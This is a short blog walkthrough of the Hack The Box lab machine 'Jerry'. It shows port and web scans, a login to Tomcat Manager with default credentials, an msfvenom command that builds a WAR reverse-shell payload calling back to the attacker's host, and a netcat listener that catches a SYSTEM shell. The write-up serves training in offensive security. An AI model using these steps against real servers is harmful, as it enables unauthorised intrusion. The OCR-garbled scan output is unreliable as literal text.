Jerry – No Metasploit

walkthroughs 1 Minute

Yeah… that’s definitely not the Jerry I remember from Tom and Jerry. Anyway, let’s get started with our usual portscan:

PORT STATE 8Ø8Ø/tcp open l_http-favicon: I http-methods: SERVICE http Apache REASON VERSION I _ Supported Methods: syn-ack tt1 127 Apache Tomcat/Coyote JSP engine 1.1 Tomcat GET HEAD POST OPTIONS l_http-server-header: Apache-coyote/ 1.1 l_http-title: Apache Tomcat/7.ø.88 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2012 (90%) OS CPE: cpe: /o:microsoft OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2012 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: OPS(OI

Okay. Let’s look at some other enumeration scans, namely gobuster on port 8080 and nikto:

kaliöhyd3 . "Tools/AutoRecon/resuIts/1ø.1ø.1ø.95/scans$ cat tcp_8Ø8Ø_http_gobuster.txt (aux (Status: (coml (Status: /com4 (Status: /com2 (Status: /com3 (Status: Icon (Status: (docs (Status: 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 302) [Size: 0] (examples (Status: 302) [Size: 0] /favicon .ico (Status: 200) [Size: 21630] (host-manager (Status: 302) [Size: 0] / index.jsp (Status: 200) [Size: 11398] (manager (Status: 302) [Size: 0] /nul (Status: 200) [Size: 0]
kalijhyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.95/scans$ cat tcp_8Ø8Ø_http_nikto.txt - Nikto v2.1.6 Target IP: Target Hostname: Target Port: Start Time: 10.10.10.95 10. 10.10.95 8080 2020-05-28 14:11:59 (GMT-4) Server: Apache-coyote/ 1.1 The anti-clickjacking X-Frame-Options header is not present. The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type No CGI Directories found (use '-C all' to force check all possible dirs) OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS OSVDB-397: HTTP method ( 'Allow' Header): 'PUT' method could allow clients to save files on the web server. OSVDB-5646: HTTP method ( 'Allow' Header): 'DELETE' may allow clients to remove files on the web server.

Hmm. Ok interesting… So we can use PUT and place a malicious file on the server…? But let’s see if there’s another way to get into this box:

Ooh Apache Tomcat! Pretty familiar with this. Using default creds: tomcat and s3cret, we get in.

Scrolling down, we see we can upload a .war file.

Deploy Deploy directory or WAR file located on server Context Path (required): XML Configuration file URL: WAR or Directory URL: Deploy WAR file to deploy Select WAR file to upload Browse... Deploy No file selected.

Too easy. We can generate a war file with msfvenom to get a reverse shell:

kalijhyd3. •-/Documents/htb/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=1ø.1ø.14.3ø LPORT=4444 -f war > hyd3 .war Payload size: 1089 bytes 'Final size of war file: 1089 bytes

Clicking the link navigates us to our war file which triggers the reverse shell

kaliö)hyd3 . "Documents/htb/jerry$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.96øø] (c) 2013 Microsoft Corporation. All rights reserved . whoami nt authority\system hostname JERRY

NT AUTHORITY\SYSTEM shell! A bit anti-climactic but oh well. Getting the flags, we see that this was the intended way because we have “2 for the price of 1.txt” for the flags:

Unknown's avatar

Published by hyd3sec

Published

Leave a comment